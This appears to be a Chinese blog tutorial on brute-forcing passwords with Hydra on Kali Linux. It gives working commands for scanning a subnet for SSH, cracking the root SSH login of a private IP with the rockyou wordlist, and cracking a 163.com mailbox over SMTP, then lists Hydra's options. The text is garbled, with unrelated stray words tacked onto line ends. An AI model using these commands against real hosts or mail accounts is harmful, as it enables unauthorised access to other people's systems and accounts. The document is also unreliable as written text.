Kail Linux有一個的GUI版本:xhydra,也有一個命令行版本:hydra。mysql
xhydra:sql
hydra:ssh
我使用命令行版本:hydraspa
字典
這種攻擊須要字典文件,一個好的字典相當重要。我以Kali Linux自帶的rockyou字典爲例,位於/user/share/wordlists/rockyou.txt.gz。命令行
使用前先解壓:線程
gzip -d /usr/share/wordlists/rockyou.txt.gz
nmap肯定開啓ssh服務的主機code
nmap -p 22 -open -sV 172.16.1.1/24
暴力破解blog
hydra -s 22 -v -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.108 ssh
爆破郵箱密碼ip
hydra -S -l test@163.com -P /usr/share/wordlists/rockyou.txt -e ns -V -s 465 -t 1 smtp.163.com smtp
下面貼一個用法class
hydra用法: hydra <參數> <IP地址> <服務名> hydra的參數是區分大小寫的. hydra支持的服務有:telnet ftp ssh mysql mssql vnc pcanywhere RDP(3389)等. hydra的一些參數: -R 繼續從上一次的進度開始爆破 -s <port> 指定端口 -l <username> 指定登陸的用戶名 -L <username-list> 指定用戶名字典 -p <password> 指定密碼 -t <number> 設置線程數 -P <passwd-list> 指定密碼字典 -v 顯示詳細過程